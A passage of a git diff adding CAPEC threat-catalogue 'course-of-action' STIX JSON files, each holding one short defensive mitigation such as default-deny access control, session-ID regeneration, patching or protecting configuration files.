"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767.json b/capec/course-of-action/course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767.json new file mode 100644 index 0000000000..6598b2b254 --- /dev/null +++ b/capec/course-of-action/course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--12294e03-a269-42be-940b-c401e7e1652c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-4-0", + "description": "Design: Default deny access control policies", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06.json b/capec/course-of-action/course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06.json new file mode 100644 index 0000000000..bbcb620d19 --- /dev/null +++ b/capec/course-of-action/course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--611a4112-f75d-4be5-8703-93609316acb9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-5", + "description": "Implementation: Hide cookie's software information filed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4.json b/capec/course-of-action/course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4.json new file mode 100644 index 0000000000..ea0b4b6619 --- /dev/null +++ b/capec/course-of-action/course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8fbd96cf-183b-4403-9b85-3d49e0a6ba8e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-196-1", + "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a.json b/capec/course-of-action/course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a.json new file mode 100644 index 0000000000..c59f27751f --- /dev/null +++ b/capec/course-of-action/course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--18b26c40-444d-4ec8-8202-0efdc5974e72", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-457-2", + "description": "Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b.json b/capec/course-of-action/course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b.json new file mode 100644 index 0000000000..aec5dc23f2 --- /dev/null +++ b/capec/course-of-action/course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d7808c05-2ba3-4769-a1fa-9e4bed63d304", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-28-1", + "description": "Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0.json b/capec/course-of-action/course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0.json new file mode 100644 index 0000000000..f1cbb5e81e --- /dev/null +++ b/capec/course-of-action/course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ec5c19a9-95a8-4189-b9fb-e2cbebd5c52f", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-131-0", + "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd.json b/capec/course-of-action/course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd.json new file mode 100644 index 0000000000..5ed1cad1aa --- /dev/null +++ b/capec/course-of-action/course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--27d31157-a391-4f60-8709-4efd3d27cad9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-1", + "description": "Implementation: Hide inner ordering of HTTP response header.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a.json b/capec/course-of-action/course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a.json new file mode 100644 index 0000000000..4dd9f7c7d0 --- /dev/null +++ b/capec/course-of-action/course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--312fd496-fdf7-4598-b780-95852fb48cf0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-2", + "description": "Apply the latest patches.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0.json b/capec/course-of-action/course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0.json new file mode 100644 index 0000000000..c359dedff6 --- /dev/null +++ b/capec/course-of-action/course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--93c67edf-2063-4bcb-a057-405d28f8f811", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-224-0", + "description": "While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application's functionality as much as possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99.json b/capec/course-of-action/course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99.json new file mode 100644 index 0000000000..0382979d79 --- /dev/null +++ b/capec/course-of-action/course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8d86bf9e-cf32-4344-bd43-9e31603857e5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-649-0", + "description": "File extensions should be checked to see if non-visible characters are being included.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212.json b/capec/course-of-action/course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212.json new file mode 100644 index 0000000000..073be3833e --- /dev/null +++ b/capec/course-of-action/course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--59c98d64-073d-48a3-b93d-ab78facd10eb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-196-0", + "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a.json b/capec/course-of-action/course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a.json new file mode 100644 index 0000000000..72aa70cb3d --- /dev/null +++ b/capec/course-of-action/course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--06b0fcff-5fb2-44a9-9ed2-86924f1fd2d7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-14-0", + "description": "The client software should not install untrusted code from a non-authenticated server.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4f26db10-8931-420a-9894-08ba87d842af.json b/capec/course-of-action/course-of-action--4f26db10-8931-420a-9894-08ba87d842af.json new file mode 100644 index 0000000000..b560796780 --- /dev/null +++ b/capec/course-of-action/course-of-action--4f26db10-8931-420a-9894-08ba87d842af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--07c37802-892b-4252-9d3e-d71752f07249", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-640-1", + "description": "Properly restrict the location of the software being used.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7.json b/capec/course-of-action/course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7.json new file mode 100644 index 0000000000..e5c01c777e --- /dev/null +++ b/capec/course-of-action/course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--17ea3505-754f-4396-9a15-4dfaa19de69a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "description": "Strong physical security of the device.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89.json b/capec/course-of-action/course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89.json new file mode 100644 index 0000000000..9d3c1e6eba --- /dev/null +++ b/capec/course-of-action/course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9ea58c1a-6ee7-4809-9ac7-488296d06145", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-142-1", + "description": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4.json b/capec/course-of-action/course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4.json new file mode 100644 index 0000000000..6cea866c39 --- /dev/null +++ b/capec/course-of-action/course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ebc41d79-6b9c-47a5-b2ec-df05747f85db", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-217-0", + "description": "Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--501aa08c-8325-4076-945a-95272170d1b9.json b/capec/course-of-action/course-of-action--501aa08c-8325-4076-945a-95272170d1b9.json new file mode 100644 index 0000000000..cde6c680e2 --- /dev/null +++ b/capec/course-of-action/course-of-action--501aa08c-8325-4076-945a-95272170d1b9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7fd2d321-effc-4685-b31c-b5f90740905d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--501aa08c-8325-4076-945a-95272170d1b9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-650-0", + "description": "\n Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.\n Insure that the file permissions in directories on the web server from which files can be execute is set to the \"least privilege\" settings, and that those directories contents is controlled by a whitelist.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e.json b/capec/course-of-action/course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e.json new file mode 100644 index 0000000000..36f172cbe2 --- /dev/null +++ b/capec/course-of-action/course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--860ebb5d-e32d-4088-87d1-cadb70bad7c9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-61-0", + "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3.json b/capec/course-of-action/course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3.json new file mode 100644 index 0000000000..955552f167 --- /dev/null +++ b/capec/course-of-action/course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0aaa73f3-032a-40b5-9a47-6368c71e8f05", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-50-1", + "description": "E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--513e1a8c-8153-40c3-8452-672f95b31666.json b/capec/course-of-action/course-of-action--513e1a8c-8153-40c3-8452-672f95b31666.json new file mode 100644 index 0000000000..198377d09a --- /dev/null +++ b/capec/course-of-action/course-of-action--513e1a8c-8153-40c3-8452-672f95b31666.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c73678cb-1f37-4cad-a0a1-b3096744ed6a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--513e1a8c-8153-40c3-8452-672f95b31666", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-615-0", + "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, man-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3.json b/capec/course-of-action/course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3.json new file mode 100644 index 0000000000..0a651f3161 --- /dev/null +++ b/capec/course-of-action/course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8bb4b84-7a1f-4e7d-ad83-60ab211b0017", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-168-0", + "description": "Design: Use FAT file systems which do not support Alternate Data Streams.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3.json b/capec/course-of-action/course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3.json new file mode 100644 index 0000000000..fca4c3f974 --- /dev/null +++ b/capec/course-of-action/course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8aa1a316-91ea-47c1-90ed-b638828c01d4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-3", + "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3.json b/capec/course-of-action/course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3.json new file mode 100644 index 0000000000..c68e992865 --- /dev/null +++ b/capec/course-of-action/course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4deca328-88ed-4332-86db-4b051f5b8ebc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-159-0", + "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc.json b/capec/course-of-action/course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc.json new file mode 100644 index 0000000000..be71995bc2 --- /dev/null +++ b/capec/course-of-action/course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--5883dfd4-54fe-4203-b702-f031a46e01b9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-133-1", + "description": "Implementation: Remove all debug and testing options from production code.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62.json b/capec/course-of-action/course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62.json new file mode 100644 index 0000000000..6e7eca05b2 --- /dev/null +++ b/capec/course-of-action/course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--44ffd147-41d0-4a25-9177-4bd29d9519b4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-127-0", + "description": "1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551.json b/capec/course-of-action/course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551.json new file mode 100644 index 0000000000..bbd431376f --- /dev/null +++ b/capec/course-of-action/course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--59c61677-70f9-4542-9f57-836dc10a0e0b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-108-2", + "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--54200ccf-356d-40d9-abff-5906b5d13075.json b/capec/course-of-action/course-of-action--54200ccf-356d-40d9-abff-5906b5d13075.json new file mode 100644 index 0000000000..478ca1a0b2 --- /dev/null +++ b/capec/course-of-action/course-of-action--54200ccf-356d-40d9-abff-5906b5d13075.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--db430e2f-735a-49db-93b0-d06e7418dda7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--54200ccf-356d-40d9-abff-5906b5d13075", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-47-0", + "description": "Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38.json b/capec/course-of-action/course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38.json new file mode 100644 index 0000000000..affb1c313f --- /dev/null +++ b/capec/course-of-action/course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--269fc16b-2924-483b-b129-2ca21b7d9234", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-13-1", + "description": "Protect the configuration files which contain environment variables against illegitimate read and write access.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0.json b/capec/course-of-action/course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0.json new file mode 100644 index 0000000000..815e9efe76 --- /dev/null +++ b/capec/course-of-action/course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--54b70b3f-25cc-4a39-9991-8b954a838838", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-48-1", + "description": "Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git 